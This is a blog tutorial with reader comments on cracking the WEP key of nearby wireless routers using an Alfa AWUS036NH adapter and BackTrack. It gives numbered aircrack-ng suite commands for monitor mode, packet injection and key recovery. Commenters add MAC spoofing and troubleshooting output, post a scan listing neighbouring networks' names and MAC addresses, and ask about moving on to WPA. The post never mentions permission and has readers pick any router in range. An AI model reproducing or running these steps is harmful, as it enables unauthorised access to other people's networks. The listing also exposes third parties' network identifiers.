Alright so I did the unboxing of the Alfa AWUS036NH a few months ago and have been putting off making a post on how to cracking WEP passwords with it until now. So here it is, I finally have done it 
. This post contains the step by step instructions on how to crack WEP with the Alfa wireless N USB adapter. I will try and explain as much as possible, but if all you want to do is crack WEP in easy steps without wanting know what the hell your doing. This post is for you 
.
Let’s start by talking about what you need. Of course you have to have the Alfa AWUS036NH adapter, if you don’t have it then buy it. The second thing you need is a copy of BackTrack 4 R2, which can be download off their website for free. I highly recommend you either burn it to a DVD or make it bootable on a USB. Thats it, if you have those your ready to go!
Step #1:
Boot into BackTrack 4 R2 and plug in the Alfa adapter. Click Here for instruction on how to make a bootable Linux USB.
Step #2:
Open a konsole or console and type the command below which starts networking.
/etc/init.d/networking start
It might take sometime to load but once it finishes and the root prompt is displaying go to step 3.
Step #3:
You are now going to set the Alfa card into monitor mode. But first you need to find out which interface the Alfa card is assigned to.
airmon-ng
You should now see possibly 2 adapters. Look for the one with the chipset Ralink RT2870/3070 (this is the ALFA) and check the interface column. It should be either wlan0 or wlan1, so you are now going to stop that interface.
airmon-ng stop wlan0
Now start that interface again to bring it up in monitor mode.
airmon-ng start wlan0
Now by using the airmon-ng command again you should see that the Ralink RT2870/3070 is also listed under the interface mon0.
Step #4:
Now you have to scan for wireless signals in your area that are being transmitted by wireless routers. Use the following command to do this:
airodump-ng mon0
A big list of wireless routers will now be displayed on the screen. Once you have found the one you want to crack press ctrl+c to stop the scanning. Now write down the Channel #, BSSID #, and ESSID as you are going to need these for commands to come.
Step #5:
Now you are going to focus the Alfa adapter to only link with the wireless router of your choice by doing the following command.
airodump-ng -w wep -c [channel #] –bssid [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #6:
Open a new console window but do not close the current one with step 5 on it. We are not going to associate the ALFA card with the connection to transmit data.
aireplay-ng -1 0 -a [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #7:
Just like in step 6 you are going to open another console window. This time we are going to start sending and receiving data packets on the connection.
aireplay-ng -3 -b [bssid #] mon0
NOTE: do not enter the [ ] brackets into the command
Step #8:
Now go back to the first console window in step 5 which is focused on the wireless router. You are now going to watch the DATA column, it has to get over 30,000 packets before you can continue to step 9 as this is VERY IMPORTANT. Might take over an hour for it to reach 30,000.
Step #9:
Once the Data column is over 30,000 go back to console window 3 which was sending and receiving packets in step 7. Now do a ctrl+c to stop the sending and receiving of packets.
We are now going to crack the wireless routers WEP security key. Enter the command dir to find the .cap file that you named wep in step 5. If its your first time doing this tutorial the .cap file should be named wep-01.cap. Now enter the following command below to crack the WEP on the router.
aircrack-ng wep-01.cap
Scroll down in the console window and the key should be there.
Doesn’t work.
After step 6 I get:
Sending Auth request (open system) (ack)
auth successful
sending asocciation request (ack)
association succesful
root@bt:
Step7:
saving ARP requests
read 30000 packets [i](is advancing fast[/i] (got 0 ARP request and 4 ACKs) [i]every time I do step 6 I get one more ACK here[/i].
But airmon doesn’t see any data packets, that stays at 0
Hey. Everything is working fine. You just need to wait for someone to access the network in order for it to start capturing packets. Let me know if you have any more questions.
Thanks for very useful and very cool explanation!
I have the same adapter but I didn’t know how to crack WEP.
Although I did not know what BackTrack was about 6hours ago, I followed this instruction and now it’s working very good.
You are a genius.
Yet, I have a question.
I am on Step8 and my laptop has been gathering packets for more than 1hour.
But Data# is 60 which is very few.
So even if I turn on my laptop for 10days, I will not be able to gather enough packets.
The AP signal is good and close though.
Why is this happening?
Could you please help me out?
Thank you very much.
Sincerely, HappyHour.
Hey, glad to here that for the most part its working for you. The issue you are having is because the ALFA adapter should be injecting packets into the access point. But for some reason it’s not doing that so you will have to wait for other computer to be active on the network. Once other computers are on the access point the Data# will go up really fast. I have been looking for a fix to this problem and I will try to update my post if I find the solution. Good luck!
Thanks for your fast and good reply.
I tried it 3 more times but it had the same problem.
So as you mentioned, I tried to find other computers but there were no WEP signals except the one I failed to crack.
However, there are WPA and WPA2 signals and I wonder If I can crack those signals with the same method.
By learning BackTrack little by little, it becomes more interesting and fun.
Again, thanks for blogging useful stuff.
Take care!
Will this work as described with the AWUS036H 1w adapter as well?
Also I have just one specific question. In another tutorial they used:
airodump-ng -c 6 bssid 00:0F:CC:7D:5A:74 -w data mon0
instead of your:
airodump-ng -w wep -c [channel #] –bssid [bssid #] mon0
Can you explain the differences?
Btw, can you please update the article with how to take it out of monitor mode back into managed mode without having to unplug and re-plugging the adapter or rebooting?
Thanks, Nice write up and I like this site. By the way I am using Windows 7 Virtualization! (Yes, modern mans cop out 8P)
It seems my post was deleted or something..
Again, will this write up work for an AWUS036h 1w?
How do you take the card out of monitor mode and put it back into managed without having to disconnect and reconnect it or rebooting?
Hey eddie,
Yes the instructions in this post will work with the AWUS036h 1w. From what I hear the AWUS036h 1w is actually more compatible with BackTrack. Now for your question on taking the card out of monitor mode, try using this command airmon-ng stop mon0. It should now only show up as wlan0 when u type airmon-ng.
Hey , it worked fine but for me the interface was Wlan1 not mon0 but you should type this as a second step after airmon-ng which is :
airmon-ng stop (interface) —-> interface here is wlan0
ifconfig (interface) down ——> interface here is wlan1
macchanger –mac 00:11:22:33:44:55 wlan1
airmon-ng start wlan1
then :
airodump-ng wlan1
My USB is Alfa AWUS036NH and i got it working fine .
Now im working on the WPA , WPA2 so post to help and feedback for the output results
Whoever get any info about WPA pls post here to help .
The hard step is to get a dictionary and woedlist to fix in BT5 .
Thanks all
Thanks for a very good post. I followed step by step and success only the one that close to my wireless adapter but not for the others nearby so I’d like to ask you for some advise.
1. When using the airodump-ng command and the screen show a list of wireless router as attached below :
CH 2 ][ Elapsed: 11 mins ][ 2011-09-07 15:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:04:ED:AB:7C:63 -59 580 17 0 1 54 WEP WEP AXIS
00:13:49:6E:1C:F7 -66 465 0 0 6 54 WEP WEP true_homewifi
00:1F:A4:B5:81:FB -75 422 0 0 1 54 . WEP WEP true_homewifi_1C
00:1F:A4:B3:73:C1 -75 427 321 0 1 54 . WPA TKIP PSK Pattanpong
00:02:6F:89:8F:F9 -81 163 509 0 1 54 . OPN Kan-Ya-Rat-AP3
C8:D5:FE:BA:CD:08 -83 97 0 0 6 54 WEP WEP Wanida
00:4F:6A:05:68:3E -83 23 4 0 6 54 WPA2 CCMP PSK Airlive
00:02:CF:94:51:C4 -1 0 0 0 108 -1
BSSID STATION PWR Rate Lost Packets Probes
00:04:ED:AB:7C:63 CC:05:1B:D5:B8:6E -61 0 -24 3 23
00:04:ED:AB:7C:63 44:2A:60:7F:B6:3F -85 54 - 1 0 19 AXIS
00:1F:A4:B3:73:C1 EC:55:F9:E3:3A:89 -75 24 -54 0 297
C8:D5:FE:BA:CD:08 90:CF:15:67:F4:6C -1 1 - 0 0 2
00:4F:6A:05:68:3E B0:48:7A:10:9E:FC -83 0 - 1 0 5
00:4F:6A:05:68:3E 00:1F:3B:4D:92:E7 -81 2 - 1 0 4
00:02:CF:94:51:C4 14:5A:05:35:96:1E -81 0 - 1 0 3
root@root:~#
I started with the one that closer to my laptop and it work quite well but once I select the others (WEP) randomly and do exactly the same what I’ve done, it’s always failed at step 6. The message “ Sending Authentication Request (Open System)” and also “ Attact was unsuccessful “. Could you please telling me on how to select which one of them. ie; the one that has highest % of signal strength(from NetStumbler)
2.Sometime step 6 is OK after running for a while but when step 7 was started it run and hung up. I noticed that everything is stop especially the last line. Untill the data or packet show on step 5 are moving just for 5-10 minutes the last line on step 7 are running up to 300000-500000 for sometime which make me smile and smile as shown below:
root@root:~# aireplay-ng -3 -b 00:13:49:6e:1c:f7 mon0
No source MAC (-h) specified. Using the device MAC (00:1F:1F:48:56:46)
06:11:29 Waiting for beacon frame (BSSID: 00:13:49:6E:1C:F7) on channel 6
Saving ARP requests in replay_arp-0905-061129.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
^Cad 314235 packets (got 13 ARP requests and 76507 ACKs), sent 99533 packets...(500 pps)
root@root:~#
When I do aircrack-ng on step 9 it’s failed. They recommend to try on next 5000 IVS since I got a large number of packets. Is there any of mistake or unforeseen that I should correct it. Please advise.
Many Thanks,
hi buddy,i have the same alpha card as you,im using bt5 live cd.how did you load the 2870/3070 driver into bt?when i start networking ini string i just have wlan0 and the rt2870 or the 3070 arnt listed either.i have the mini cd you have too.can you tell me step by step how to install the drivers i need for monitor mode.thanks,any help welcome.
please help me:
i’m stuck in step 6>
The interface MAC (00:C0:CA:3E:D4:AF) doesn’t match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
02:30:35 Waiting for beacon frame (BSSID: 5C:D9:98:EF:20:F9) on channel -1
02:30:35 mon0 is on channel -1, but the AP uses channel 6
hey guys, I am new to this but I’m getting the hang of it. There is one little problem that is stopping me from doing magic. I follow all steps but on step(( #6:Open a new console window)) I CANT OPEN IT! i have no icon that will open a new console or command line. I tried CTRL+z but it stops it, i try CTRL+z then %1 and still stops it! How the heck can I open another console window without stopping the aireplay-ng from running in the background. Help is urgent! thanks!
Hey please confirm and post if AWUS036NH works in backtrack 5 R1 because I plan on buying it. Thank you in advance.
Correction, “works” as in can it perform a successful attack? Also will it work in virtualbox?